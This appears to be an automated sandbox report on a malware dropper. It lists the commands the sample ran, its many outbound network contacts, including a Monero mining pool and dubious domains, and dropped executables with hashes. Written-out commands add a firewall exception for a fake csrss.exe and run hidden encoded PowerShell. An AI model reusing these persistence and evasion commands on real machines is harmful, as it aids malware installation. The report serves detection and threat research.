C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "goylhAwiC"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 update.wf udp
US 8.8.8.8:53 drivelikea.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 hbn42414.beget.tech udp
US 8.8.8.8:53 lancetjournal.com udp
US 8.8.8.8:53 galandskiyher4.com udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 grupoeca.co udp
US 8.8.8.8:53 link.storjshare.io udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 yip.su udp
NL 185.26.182.111:80 net.geo.opera.com tcp
DE 148.251.234.93:443 yip.su tcp
US 104.21.32.208:443 lycheepanel.info tcp
US 188.114.97.0:443 lancetjournal.com tcp
US 188.114.96.0:443 lancetjournal.com tcp
US 104.21.93.225:443 flyawayaero.net tcp
RU 91.212.166.16:443 update.wf tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 194.169.175.127:80 galandskiyher4.com tcp
NL 13.227.219.74:443 downloads.digitalpulsedata.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 87.236.19.5:80 hbn42414.beget.tech tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 winterhunter.org udp
US 172.67.180.173:443 potatogoose.com tcp
US 172.67.191.78:443 winterhunter.org tcp
US 72.29.85.225:443 grupoeca.co tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 74.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 16.166.212.91.in-addr.arpa udp
US 8.8.8.8:53 5.19.236.87.in-addr.arpa udp
US 8.8.8.8:53 d062.userscloud.net udp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 78.191.67.172.in-addr.arpa udp
US 8.8.8.8:53 225.85.29.72.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 19.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.93:443 features.opera-api2.com tcp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 69.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 93.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
US 8.8.8.8:53 m7val1dat0r.info udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 208.67.104.60:80 tcp
US 8.8.8.8:53 80.121.18.2.in-addr.arpa udp
NL 94.142.138.131:80 94.142.138.131 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
US 8.8.8.8:53 131.138.142.94.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:80 vk.com tcp
RU 87.240.132.67:443 vk.com tcp
US 8.8.8.8:53 67.132.240.87.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
CA 159.203.48.195:7001 tcp
US 8.8.8.8:53 www.google.nl udp
NL 142.251.36.3:443 www.google.nl tcp
US 8.8.8.8:53 195.48.203.159.in-addr.arpa udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
CA 174.138.115.38:7001 tcp
US 8.8.8.8:53 host-host-file8.com udp
US 8.8.8.8:53 www.google.nl udp
NL 142.251.36.3:443 www.google.nl tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 38.115.138.174.in-addr.arpa udp
US 8.8.8.8:53 datasheet.fun udp
US 104.21.89.251:80 datasheet.fun tcp
US 8.8.8.8:53 251.89.21.104.in-addr.arpa udp
CA 192.18.144.233:7001 tcp
US 8.8.8.8:53 www.google.nl udp
NL 142.251.36.3:443 www.google.nl tcp
US 8.8.8.8:53 233.144.18.192.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp

Files

memory/644-0-0x00007FF79FA40000-0x00007FF7A00F4000-memory.dmp

memory/644-1-0x00000291CEAA0000-0x00000291CEAB0000-memory.dmp

memory/712-6-0x00000201F96F0000-0x00000201F9712000-memory.dmp

memory/712-7-0x00007FFC33D10000-0x00007FFC346FC000-memory.dmp

memory/712-8-0x00000201F9D30000-0x00000201F9D40000-memory.dmp

memory/712-11-0x00000201F9EC0000-0x00000201F9F36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgamqhke.wht.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/712-24-0x00000201F9D30000-0x00000201F9D40000-memory.dmp

memory/644-35-0x00007FF79FA40000-0x00007FF7A00F4000-memory.dmp

memory/4176-39-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4176-41-0x0000000073950000-0x000000007403E000-memory.dmp

memory/4176-48-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

memory/712-51-0x00000201F9D30000-0x00000201F9D40000-memory.dmp

memory/712-55-0x00007FFC33D10000-0x00007FFC346FC000-memory.dmp

C:\Users\Admin\Pictures\HBp7JQplVAnzdzDK11rS07tc.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe

MD5 adfd7adf5337898e585f72a394115efc
SHA1 19f48e895f1bf1fa7af12ff50cd23e50aeacbbaa
SHA256 8f4f1698d10dfdc229afcbf6c9f35086991c5152f10f5f15415df6a5813a9977
SHA512 6164eb18182771ee503f12ca22f55793e1b8b94dc02ee955b24a2fa098b9bab222a07457ce007e3b45e7fec2644f8d9d26bfe52b52966fd94878d52847507c37

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

MD5 ddaf5b09a3ac1f85960b3b767c831892
SHA1 02f81e5fe283c783dfe61dff72fb3d870835a481
SHA256 bccf0ad64a32d308393d0845df585777f1383775886f18666a5d5ae9f32da97d
SHA512 a6927345e7b2166e9f02ebe28ad175dbde8d6f55b85cd1064cec7a7e01ab3391725b08ccb1f8c2aa83a76540fbd1c1e4ffa5fdb04a746bbb5ff7115590d3147d

C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/4516-118-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/5112-117-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe

MD5 adfd7adf5337898e585f72a394115efc
SHA1 19f48e895f1bf1fa7af12ff50cd23e50aeacbbaa
SHA256 8f4f1698d10dfdc229afcbf6c9f35086991c5152f10f5f15415df6a5813a9977
SHA512 6164eb18182771ee503f12ca22f55793e1b8b94dc02ee955b24a2fa098b9bab222a07457ce007e3b45e7fec2644f8d9d26bfe52b52966fd94878d52847507c37

C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe

MD5 1e34d43e426276ebd4f374befff4304c
SHA1 576b7ab66364d8d2e6cd1c9755e6a0f829ff63c4
SHA256 9f6b486add45dd99e474a16e165ab275a988297c78f6587d8975fd3dda0af090
SHA512 e8f7dc820c5acb6cfb19b56f13d9552de0283309f76de66fefa8974e5ef0579b76fa9dfc2cb266fe168f60ae48f0ce766285e61bc1e619ce337d7c00cb7222c1

C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

MD5 ddaf5b09a3ac1f85960b3b767c831892
SHA1 02f81e5fe283c783dfe61dff72fb3d870835a481
SHA256 bccf0ad64a32d308393d0845df585777f1383775886f18666a5d5ae9f32da97d
SHA512 a6927345e7b2166e9f02ebe28ad175dbde8d6f55b85cd1064cec7a7e01ab3391725b08ccb1f8c2aa83a76540fbd1c1e4ffa5fdb04a746bbb5ff7115590d3147d

C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe

MD5 0b5f56cdc6ba1767bfafcf3044a58884
SHA1 4ac121f5a4bb7af70b318d191895074b56062c5b
SHA256 09b369e70491444175f7bd84be3179b3c96641cfaab6d04acbf014b2c80249f4
SHA512 e69b3475745a057e9f4f009fd326e19a8b99da2b16ac66af7ae3d974e5a0e09bb2d3b517881127fd32ab39dcc45893af3200ef2e3d6b0c66d26df169828654d6

C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe

MD5 0b5f56cdc6ba1767bfafcf3044a58884
SHA1 4ac121f5a4bb7af70b318d191895074b56062c5b
SHA256 09b369e70491444175f7bd84be3179b3c96641cfaab6d04acbf014b2c80249f4
SHA512 e69b3475745a057e9f4f009fd326e19a8b99da2b16ac66af7ae3d974e5a0e09bb2d3b517881127fd32ab39dcc45893af3200ef2e3d6b0c66d26df169828654d6

C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe

MD5 1e34d43e426276ebd4f374befff4304c
SHA1 576b7ab66364d8d2e6cd1c9755e6a0f829ff63c4
SHA256 9f6b486add45dd99e474a16e165ab275a988297c78f6587d8975fd3dda0af090
SHA512 e8f7dc820c5acb6cfb19b56f13d9552de0283309f76de66fefa8974e5ef0579b76fa9dfc2cb266fe168f60ae48f0ce766285e61bc1e619ce337d7c00cb7222c1

memory/3988-114-0x00000000012D0000-0x000000000181D000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055417993988.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/4544-122-0x00000000008F0000-0x0000000000C0C000-memory.dmp

memory/4544-134-0x0000000005980000-0x0000000005E7E000-memory.dmp

memory/4544-133-0x0000000073950000-0x000000007403E000-memory.dmp

memory/4544-138-0x0000000005520000-0x00000000055B2000-memory.dmp

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

memory/4544-144-0x00000000055C0000-0x000000000565C000-memory.dmp

memory/4544-150-0x0000000005480000-0x00000000054E6000-memory.dmp

memory/4140-151-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/4544-154-0x0000000006070000-0x0000000006080000-memory.dmp

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055447523964.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055447523964.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\XPGL2Iq2vXRS7Z16Fr3fh9L6.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

C:\Users\Admin\Pictures\XPGL2Iq2vXRS7Z16Fr3fh9L6.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

memory/3964-187-0x0000000000160000-0x00000000006AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\is-52LKL.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

MD5 b197232556dd9ade88d4d406b06fc7a7
SHA1 e31375fbdc786f2375f235f9914444731bb3a14d
SHA256 c983cf56221b8e1a61a7a58911ec007643bcb0de353b32d2b820097f8a7e65bd
SHA512 5dd2ee5e28074f97904b369936450e435f37bdb60bcf68982d33d4ade562c3196b032406172ea30aecf9f8dcb217d8b773a775e10d6a023f931ff2c4840567a6

\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055470022108.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2108-211-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/3656-212-0x00000000024B0000-0x00000000025B0000-memory.dmp

memory/3228-224-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/5008-228-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4272-230-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 66405f56f6d73a541c6f9983355367cb
SHA1 3dc44aa183d6b2a6bdfe3d0f43a571091e315c9f
SHA256 c262f62ebf00cb65b66ed34c08abe60bfb8eb2a123a8c5459df4f40eb41934d8
SHA512 dbf8c0acfa411799c24f88474f2a86247e847cde678868a2f9991554d541ac6a230f5e51269ad3fd35492abf1e7928beae0b21ae6b3b740a5086bdfcb7a22f99

memory/5116-243-0x0000000004240000-0x0000000004644000-memory.dmp

memory/4068-246-0x0000000004760000-0x000000000504B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSE177.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 66405f56f6d73a541c6f9983355367cb
SHA1 3dc44aa183d6b2a6bdfe3d0f43a571091e315c9f
SHA256 c262f62ebf00cb65b66ed34c08abe60bfb8eb2a123a8c5459df4f40eb41934d8
SHA512 dbf8c0acfa411799c24f88474f2a86247e847cde678868a2f9991554d541ac6a230f5e51269ad3fd35492abf1e7928beae0b21ae6b3b740a5086bdfcb7a22f99

memory/1744-247-0x0000000010000000-0x0000000010571000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 cd9e384c76b7ecc6818ea5f7e63c14e0
SHA1 e0bf6c462b879bc93e94e2ae1444be0d8cdf3550
SHA256 5329b643c7617d446ed580289bb5a0386b3b0b97cf970d8c34b36d231ef45a7d
SHA512 02ec8a723c4a710dd70dc343838996a318ba0ac87069a3ad530e9b9312c3ed395dd5cf36247422376fd48b97f7ac314cf02f9dfe9fd4b655c4f9ca47f889f270

memory/4516-253-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4544-254-0x0000000073950000-0x000000007403E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

memory/4068-260-0x0000000000400000-0x0000000002670000-memory.dmp

memory/1744-267-0x0000000000150000-0x0000000000825000-memory.dmp

memory/5112-252-0x0000000000400000-0x0000000000413000-memory.dmp

memory/5116-268-0x0000000000400000-0x0000000002670000-memory.dmp

memory/5116-251-0x0000000000400000-0x0000000002670000-memory.dmp

memory/4068-235-0x0000000004360000-0x000000000475F000-memory.dmp

memory/3988-231-0x00000000012D0000-0x000000000181D000-memory.dmp

memory/5084-278-0x00007FF682BC0000-0x00007FF683103000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

\Users\Admin\AppData\Local\Temp\Opera_installer_2310070055479703228.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

MD5 ddaf5b09a3ac1f85960b3b767c831892
SHA1 02f81e5fe283c783dfe61dff72fb3d870835a481
SHA256 bccf0ad64a32d308393d0845df585777f1383775886f18666a5d5ae9f32da97d
SHA512 a6927345e7b2166e9f02ebe28ad175dbde8d6f55b85cd1064cec7a7e01ab3391725b08ccb1f8c2aa83a76540fbd1c1e4ffa5fdb04a746bbb5ff7115590d3147d

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

